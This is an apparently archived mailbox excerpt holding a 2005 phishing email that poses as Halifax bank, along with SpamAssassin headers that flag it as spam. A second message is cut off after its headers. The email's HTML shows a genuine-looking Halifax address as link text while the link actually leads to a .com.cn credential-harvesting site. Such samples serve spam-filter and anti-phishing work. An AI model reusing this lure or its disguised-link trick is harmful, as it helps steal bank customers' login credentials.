From: "Halifax" <secure@halifax.co.uk>
To: "Jose" <nobody@example.com>
References: <cochrane9-SEI2QimYFQplEX4ECL765zq00@e-Gold.com>
Subject: Halifax Account Security Measures!
Date: Sun, 04 Dec 2005 19:17:58 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--19834479855788098402"
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: *************
X-Spam-Status: Yes, score=13.1 required=5.0 tests=HTML_IMAGE_ONLY_20,
	HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,HTML_TAG_EXIST_TBODY,
	MIME_BOUND_DD_DIGITS,MIME_HTML_ONLY,MIME_HTML_ONLY_MULTI,
	MIME_QP_LONG_LINE,MPART_ALT_DIFF,RCVD_NUMERIC_HELO,X_MESSAGE_INFO 
	autolearn=spam version=3.0.2
X-Spam-Report: 
	*  4.1 MIME_BOUND_DD_DIGITS Spam tool pattern in MIME boundary
	*  4.2 X_MESSAGE_INFO Bulk email fingerprint (X-Message-Info) found
	*  1.2 RCVD_NUMERIC_HELO Received: contains an IP address used for HELO
	*  0.4 HTML_IMAGE_ONLY_20 BODY: HTML: images with 1600-2000 bytes of words
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 HTML_TAG_EXIST_TBODY BODY: HTML has "tbody" tag
	*  0.1 MPART_ALT_DIFF BODY: HTML and text parts are different
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  0.0 MIME_QP_LONG_LINE RAW: Quoted-printable line longer than 76 chars
	*  0.1 HTML_MIME_NO_HTML_TAG HTML-only message, but there is no HTML tag
	*  2.4 MIME_HTML_ONLY_MULTI Multipart message only has text/html MIME parts
Status: O
X-Status: 
X-Keywords:                  
X-UID: 81

----19834479855788098402
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0">
  <tbody> 
  <tr>
<td class=3D"HeaderCell" align=3D"left" height=3D"57" bgcolor=3D"#6699FF">=

<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100=
%">
<tbody><tr>
<td align=3D"left" nowrap width=3D"363">
<img src=3D"https://www.halifax-online.co.uk/LookAndFeel/images/Halifax/hx=
givingyouextra.gif" alt=3D"Online Logo" height=3D"45" width=3D"273"></td>
<td align=3D"left" nowrap width=3D"363">
<p align=3D"center"><b><font size=3D"3" color=3D"#FFFFFF" face=3D"Arial">I=
MPORTANT 
NOTICE</font></b></td>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td align=3D"left" valign=3D"top">
&nbsp;<p><font face=3D"Arial" size=3D"2">Dear Halifax Customer,</font></p>=

<p><font face=3D"Arial" size=3D"2">This mail is to inform you about the im=
portant 
urgent updates of our service<br>
you are requested to please follow the link below and update your HALIFAX<=
br>
ONLINE account.</font></p>
<p><font face=3D"Arial" size=3D"2"><img src=3D"https://www.halifax-online.=
co.uk/LookAndFeel/images/arrow_right.gif" border=3D"0" width=3D"8" height=3D=
"9"><a href=3D"http://halifax.secure-validations.com.cn/Halifax/secure/log=
in/index.php">https://www.halifax-online.co.uk/_mem_bin/formslogin.asp?Upd=
ate_Account</a></font></p>
<p>&nbsp;</p>
<p><font face=3D"Arial" size=3D"2">Thanks</font></p>
<p><font face=3D"Arial" size=3D"2">M. Mark Johnson<br>
<i>(Security &amp; Fraud Update Incharge)<br>
Halifax Online Banking Ltd.</i></font></p><hr size=3D"1">
<p><font face=3D"Arial" color=3D"#808080" size=3D"2">Please feel free to c=
all us 
anytime 24/7 at 08456 02 00 00 for support<br>
Mail ID: mhfx-update-02.845/-93</font></p></td>
</tr>
</tbody></table>

----19834479855788098402--

From tracy@magenta.magenta  Sun Dec  4 13:26:58 2005
Return-Path: <tracy@magenta.magenta>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id 24ECB536EB3
	for <nobody@login.example.com>; Sun,  4 Dec 2005 13:26:58 -0500 (EST)
Received: from mail2.example.com (localhost.example.com [127.0.0.1])
	by mail2.example.com (Postfix) with ESMTP id BAB0D6FA243
	for <nobody@example.com>; Sun,  4 Dec 2005 13:26:56 -0500 (EST)
Received: from magenta (fl-65-41-132-133.sta.sprint-hsd.net [65.41.132.133])
	by mail2.example.com (Postfix) with ESMTP
	for <nobody@example.com>; Sun,  4 Dec 2005 13:26:56 -0500 (EST)
Received: by magenta (Postfix, from userid 1027)
	id 57A6B88CCA; Sun,  4 Dec 2005 13:26:48 -0500 (EST)
To: nobody@example.com
Subject: Reactivate Your Account!
